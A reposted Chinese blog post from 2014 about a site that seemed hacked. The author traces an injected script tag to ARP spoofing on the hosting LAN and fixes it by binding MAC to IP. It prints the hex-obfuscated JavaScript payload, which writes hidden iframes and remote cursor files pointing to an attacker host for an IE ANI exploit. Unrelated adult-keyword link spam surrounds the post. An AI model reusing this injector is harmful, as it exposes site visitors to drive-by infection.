一区二区久久-一区二区三区www-一区二区三区久久-一区二区三区久久精品-麻豆国产一区二区在线观看-麻豆国产视频

網(wǎng)站被黑的假象--ARP欺騙之頁(yè)面中加入一段js

2014-10-21 20:55:59 分類:JavaScript技術(shù) 閱讀()
昨天晚上發(fā)現(xiàn)訪問(wèn)我的網(wǎng)站的時(shí)候網(wǎng)頁(yè)代碼html的前面多了一串js代碼。剛開(kāi)始以為網(wǎng)站被黑了,趕緊到服務(wù)器上查看所有文件是否帶有這串js代碼,搜索結(jié)果沒(méi)有,而且服務(wù)器也沒(méi)發(fā)現(xiàn)被入侵的痕跡。
<script src=http://fuck.ns2go.com/dir/index_pic/1.js></script>

于是只能從這段代碼入手,我下載這個(gè)js開(kāi)發(fā)發(fā)現(xiàn)是下面一段代碼:
復(fù)制代碼 代碼如下:
window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65/x6c/x6e"]("/x3c/x44/x49/x56 /x73/x74/x79/x6c/x65/x3d/"/x43/x55/x52/x53/x4f/x52/x3a /x75/x72/x6c/x28/'/x68/x74/x74/x70/x3a/////x66/x75/x63/x6b/x2e/x6e/x73/x32/x67/x6f/x2e/x63/x6f/x6d///x64/x69/x72///x69/x6e/x64/x65/x78/x5f/x70/x69/x63///x31/x2e/x67/x69/x66/'/x29/"/x3e"); 
window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65/x6c/x6e"]("/x3c/x44/x49/x56 /x73/x74/x79/x6c/x65/x3d/"/x43/x55/x52/x53/x4f/x52/x3a /x75/x72/x6c/x28/'/x68/x74/x74/x70/x3a/////x66/x75/x63/x6b/x2e/x6e/x73/x32/x67/x6f/x2e/x63/x6f/x6d///x64/x69/x72///x69/x6e/x64/x65/x78/x5f/x70/x69/x63///x32/x2e/x67/x69/x66/'/x29/"/x3e/x3c///x44/x49/x56/x3e/x3c///x44/x49/x56/x3e"); 
window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65/x6c/x6e"]("/x3c/x69/x66/x72/x61/x6d/x65 /x73/x72/x63/x3d/x68/x74/x74/x70/x3a/////x66/x75/x63/x6b/x2e/x6e/x73/x32/x67/x6f/x2e/x63/x6f/x6d///x64/x69/x72///x69/x6e/x64/x65/x78/x5f/x70/x69/x63///x30/x36/x30/x31/x34/x2e/x68/x74/x6d /x77/x69/x64/x74/x68/x3d/x31 /x68/x65/x69/x67/x68/x74/x3d/x31/x3e/x3c///x69/x66/x72/x61/x6d/x65/x3e"); 
window["/x64/x6f/x63/x75/x6d/x65/x6e/x74"]["/x77/x72/x69/x74/x65/x6c/x6e"]("/x3c/x69/x66/x72/x61/x6d/x65 /x73/x72/x63/x3d/x68/x74/x74/x70/x3a/////x66/x75/x63/x6b/x2e/x6e/x73/x32/x67/x6f/x2e/x63/x6f/x6d///x64/x69/x72///x69/x6e/x64/x65/x78/x5f/x70/x69/x63///x74/x6a/x2e/x68/x74/x6d /x77/x69/x64/x74/x68/x3d/x30 /x68/x65/x69/x67/x68/x74/x3d/x30/x3e/x3c///x69/x66/x72/x61/x6d/x65/x3e") 

在google上搜索發(fā)現(xiàn)有人已經(jīng)發(fā)現(xiàn)同樣情況.http://0e2.NET/post/676.html
看了這篇文章之后了解到不是服務(wù)器被黑了,而是服務(wù)器所在的機(jī)房?jī)?nèi)網(wǎng)有中木馬病毒的主機(jī)在搞arp欺騙.
這些木馬捕抓了我的服務(wù)器發(fā)送出來(lái)的報(bào)文之后,篡改了報(bào)文的內(nèi)容,在html頭加入了前面那段木馬病毒代碼.然后再轉(zhuǎn)發(fā)給訪問(wèn)我網(wǎng)站的用戶主機(jī).這段木馬是針對(duì)ie的ani漏洞的,微軟用戶的電腦要趕緊升級(jí)打補(bǔ)丁.
最后問(wèn)題就在于如何讓我的服務(wù)器防止被ARP欺騙.打電話到機(jī)房,技術(shù)人員讓我們將mac和ip地址綁定,問(wèn)題終于解決.
關(guān)于ARP欺騙相關(guān)知識(shí):
http://zhidao.baidu.com/question/7980952.html?si=1

JavaScript技術(shù)網(wǎng)站被黑的假象--ARP欺騙之頁(yè)面中加入一段js,轉(zhuǎn)載需保留來(lái)源!

鄭重聲明:本文版權(quán)歸原作者所有,轉(zhuǎn)載文章僅為傳播更多信息之目的,如作者信息標(biāo)記有誤,請(qǐng)第一時(shí)間聯(lián)系我們修改或刪除,多謝。

標(biāo)簽:
主站蜘蛛池模板: 亚洲天堂色网站 | 69免费在线视频 | 青青国产成人久久91网站站 | 亚洲视频在线一区二区 | 91视频一88av| 五月婷婷六月丁香在线 | 5566夜色| 青草精品视频 | 国产超91| 亚洲欧美激情视频 | 国产九九精品视频 | 成人在线免费视频 | 久久免费精品国产72精品剧情 | 国产精选91热在线观看 | 久久综合九色综合97婷婷群聊 | 99pao在线视频成精品 | 91久久九九精品国产综合 | 亚洲国产天堂久久综合 | 久久精品网 | 色婷婷影院在线视频免费播放 | 91在线欧美精品观看 | 日韩图色 | 成人黄视频在线观看 | 日韩在线观看一区 | 一区二区三区在线免费视频 | 91在线激情在线观看 | 加勒比色久综合在线 | 久久精品国产亚洲婷婷 | 日韩一区二区三区中文字幕 | 一本色道久久综合一区 | 精品国产亚洲一区二区三区 | 亚洲人成a在线网站 | 国产在线播放一区 | 欧洲精品码一区二区三区免费看 | 中文字幕一二三区乱码老 | 亚洲影视精品 | 久久看视频| 91亚洲视频在线观看 | 国产精品福利在线观看秒播 | 91在线品视觉盛宴免费 | 日韩精品中文字幕久久 |